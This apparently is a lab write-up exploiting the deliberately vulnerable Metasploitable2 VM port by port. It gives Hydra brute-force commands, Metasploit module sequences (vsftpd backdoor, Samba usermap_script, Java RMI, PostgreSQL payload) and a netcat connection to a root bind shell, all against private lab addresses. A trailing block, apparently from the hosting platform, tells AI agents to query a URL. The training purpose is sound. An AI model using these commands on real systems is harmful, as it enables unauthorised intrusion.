# Metasploitable2 Today I will be exploiting open ports on Metasploitable2. There are a total of 30 vulnerabilities on this machine, but I’m not exploiting all of them in depth. > **What is Metasploitable**? It’s an intentionally vulnerable Linux virtual machine that can be used to conduct security training, test security tools, and practice common penetration testing techniques. Total of 30 exploits on this machine! ## Tools: * Kali Linux * VMware or VirtualBox * Vulnhub Download: [Metasploitable 2](https://sourceforge.net/projects/metasploitable/) Let’s Begin! ## **21 | FTP** > FTP means “File Transfer Protocol” and refers to a group of rules that govern how computers transfer files from one system to another over the internet.

There are 3 ways I could exploit port 21 **1**. Login with Anonymous as a username and no password.

**2**. Brute-force using Hydra but with a custom list of usernames and passwords. ``` hydra -L /usr/share/usernames.lst -P /usr/share/userpass.lst 192.168.200.129 ftp -v ```

Once you found the credentials you can directly log in After login into a user account, You can get root access by doing Privilege escalation. **3**. Metasploit ``` Search vsftpd use exploit/unix/ftp/vsftpd_234_backdoor set RHOSTS 192.168.200.129 options exploit ```

## **22 | SSH** > SSH, also known as Secure Shell or Secure Socket Shell, is a network protocol that gives users, particularly system administrators, a secure way to access a computer over an unsecured network.

The two ways I exploited SSH 1. hydra Brute force ``` hydra -L /usr/share/usernames.lst -P /usr/share/userpass.lst 192.168.200.129 ssh ```

2\. Msfconsole ``` msfconsole search ssh_login use auxiliary/scanner/ssh/ssh_login set RHOSTS set USER_FILE set PASS_FILE options exploit ```

### **23 | TELNET** > Enables a user to manage an account or device remotely. For example, a user may telnet into a computer that hosts their website to manage his or her files remotely.

``` telnet 192.168.200.129 ```

## 25 | SMTP > SMTP stands for Simple Mail Transfer Protocol, and it’s an application used by mail servers to send, receive, and/or relay outgoing mail between email senders and receivers.

Port 25 has two vulnerabilities that make it exploitable 1. Telnet ``` nc 192.168.200.129 25 ```

[For SMTP Commands](http://www.tcpipguide.com/free/t_SMTPCommands-2.htm) 2\. Msfconsole ``` msfconsole search smtp_version use auxiliary/scanning/smtp/smtp_version set RHOST 192.168.200.129 options exploit ```

## 139 445 | NetBIOS-ssn SAMBA > NetBIOS is a protocol to connect two computers to transmit heavy data traffic. It is mostly used for printer and file services over a network. > > *Samba is an open-source project that is widely used on Linux and Unix computers so they can work with Windows file and print services.*

``` msfconsole search samba use exploit/multi/samba/usermap_script set RHOSTS 192.168.200.129 Set LHOST 192.168.200.128 Set LPORT 4444 options exploit ```

## 1099 | JAVA-rmi > Remote Method Invocation (RMI) is an API that allows an object to invoke a method on an object that exists in another address space, which could be on the same machine or a remote machine.

Exploiting Java-rmi with Metasploit ``` msfconsole search java_rmi use exploit/multi/misc/java_rmi_server set RHOSTS 192.168.200.129 options exploit ```

## 1524 | Bindshell > Bind shell is a type of shell in which the target machine opens up a communication port or a listener on the victim machine and waits for an incoming connection. The attacker then connects to the victim machine’s listener which then leads to code or command execution on the server.

It is a root shell so we can connect through netcat service. ``` nc 192.168.200.128 1524 ```

## 2121 | ProFTPD > ProFTPD is a ftp server written for use on Unix and Unix-a-like operating systems

This requires a login so let's use msfadmin that we found on the webpage. ``` telnet 192.168.200.129 ```

## 3306 | MYSQL > MySQL is a database management system. > > To add, access, and process data stored in a computer database, you need a database management system such as MySQL Server.

Exploiting MySQL with Metasploit ``` search mysql_login use auxiliary/scanner/mysql/mysql_login set rhosts 192.168.200.129 options exploit ```

Found user ‘root’. Time to login to MySQL ``` mysql -u root -h 192.168.200.129 ```

## 5432| PostgreSQL > PostgreSQL is used as the primary data store or data warehouse for many web, mobile, geospatial, and analytics applications.

Exploiting PostgreSQL with Msfconsole ``` search postgres_payload use exploit/linux/postgres/postgres_payload show options set rhosts 192.168.200.129 set lhosts 192.168.200.128 exploit ```

After login into Postgres, You can get root access through Privilege escalation. --- # Agent Instructions: Querying This Documentation If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question. Perform an HTTP GET request on the current page URL with the `ask` query parameter: ``` GET https://foothold.gitbook.io/blog/vulnhub/metasploitable2.md?ask= ``` The question should be specific, self-contained, and written in natural language. The response will contain a direct answer to the question and relevant excerpts and sources from the documentation. Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.